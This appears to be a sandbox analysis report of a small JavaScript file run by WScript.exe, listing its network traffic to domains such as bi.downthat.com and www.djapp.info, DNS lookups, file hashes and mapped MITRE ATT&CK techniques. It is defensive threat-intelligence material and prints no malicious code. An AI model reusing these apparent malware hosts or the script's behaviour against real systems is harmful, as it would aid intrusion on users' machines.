GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8PZ6cjwQfSFJGxnYodZemIDVUCUxZCbPi6AaTzTMqEjT0Dy1ZzsRdJwPC-a2Gb10sCa-jfoRAmtseQuSr9hnalRBqmK0P9-YXbb3Psqt8pXyE8Zw4_qIgTX7-KNhAU_41DdkKMx1MsYFXKwc5qY99-CvoW2NES06IfoyJJm4Tv08HSYiG%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3D4c04917e5fbc1b2cebd5f7453f246663&TIME=20240508T112332Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981&muid=F93159F48ABC3E2BDF7350B998F17BEB

HTTP Response

204
88.221.83.184:443

https://www.bing.com/aes/c.gif?RG=16c3a93125b949fd8d962a034bccd1ce&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T112332Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981

tls, http2

1.4kB
5.3kB
16
10

HTTP Request

GET https://www.bing.com/aes/c.gif?RG=16c3a93125b949fd8d962a034bccd1ce&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240508T112332Z&adUnitId=11730597&localId=w:F93159F4-8ABC-3E2B-DF73-50B998F17BEB&deviceId=6825829378917981

HTTP Response

200
88.221.83.184:443

https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

tls, http2

1.6kB
6.4kB
16
12

HTTP Request

GET https://www.bing.com/th?id=OADD2.10239359720591_10PHTLBML42K6TRZO&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=24&h=24&dynsize=1&qlt=90

HTTP Response

200
3.130.253.23:80

http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

http

WScript.exe

691 B
283 B
6
3

HTTP Request

GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

HTTP Response

302
3.130.253.23:80

http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

http

WScript.exe

691 B
283 B
6
3

HTTP Request

GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

HTTP Response

302
3.130.253.23:80

http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

http

WScript.exe

691 B
283 B
6
3

HTTP Request

GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

HTTP Response

302
3.130.253.23:80

http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

http

WScript.exe

691 B
283 B
6
3

HTTP Request

GET http://bi.downthat.com/?script_error4=1&The%20system%20cannot%20locate%20the%20resource%20specified.&errorloc=manual_redirect1&downloadurl=

HTTP Response

302
204.79.197.200:443

https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

tls, http2

30.5kB
883.0kB
645
641

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360931610_110BPTPDN41GIXK2B&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

HTTP Request

GET https://tse1.mm.bing.net/th?id=OADD2.10239360931609_1JAA48IJSET6WWQHH&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

HTTP Response

200

HTTP Response

200
204.79.197.200:443

tse1.mm.bing.net

tls, http2

1.2kB
8.1kB
16
13

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

www.djapp.info

dns

WScript.exe

60 B
139 B
1
1

DNS Request

www.djapp.info
8.8.8.8:53

bi.downthat.com

dns

WScript.exe

61 B
191 B
1
1

DNS Request

bi.downthat.com

DNS Response

3.130.253.23

3.130.204.160
8.8.8.8:53

www.hugedomains.com

dns

WScript.exe

65 B
113 B
1
1

DNS Request

www.hugedomains.com

DNS Response

172.67.70.191

104.26.7.37

104.26.6.37
8.8.8.8:53

228.249.119.40.in-addr.arpa

dns

73 B
159 B
1
1

DNS Request

228.249.119.40.in-addr.arpa
8.8.8.8:53

23.253.130.3.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

23.253.130.3.in-addr.arpa
8.8.8.8:53

g.bing.com

dns

56 B
151 B
1
1

DNS Request

g.bing.com

DNS Response

204.79.197.237

13.107.21.237
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

72.32.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

72.32.126.40.in-addr.arpa
8.8.8.8:53

237.197.79.204.in-addr.arpa

dns

73 B
143 B
1
1

DNS Request

237.197.79.204.in-addr.arpa
8.8.8.8:53

184.83.221.88.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

184.83.221.88.in-addr.arpa
8.8.8.8:53

43.58.199.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

43.58.199.20.in-addr.arpa
8.8.8.8:53

13.86.106.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

13.86.106.20.in-addr.arpa
8.8.8.8:53

www.djapp.info

dns

WScript.exe

120 B
278 B
2
2

DNS Request

www.djapp.info

DNS Request

www.djapp.info
8.8.8.8:53

www.djapp.info

dns

WScript.exe

60 B
139 B
1
1

DNS Request

www.djapp.info
8.8.8.8:53

86.23.85.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

86.23.85.13.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

www.djapp.info

dns

WScript.exe

60 B
139 B
1
1

DNS Request

www.djapp.info
8.8.8.8:53

www.djapp.info

dns

WScript.exe

60 B
139 B
1
1

DNS Request

www.djapp.info
8.8.8.8:53

240.197.17.2.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

240.197.17.2.in-addr.arpa
8.8.8.8:53

249.197.17.2.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

249.197.17.2.in-addr.arpa
8.8.8.8:53

29.243.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

29.243.111.52.in-addr.arpa
8.8.8.8:53

tse1.mm.bing.net

dns

62 B
173 B
1
1

DNS Request

tse1.mm.bing.net

DNS Response

204.79.197.200

13.107.21.200
8.8.8.8:53

200.197.79.204.in-addr.arpa

dns

73 B
106 B
1
1

DNS Request

200.197.79.204.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\fuf4314.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.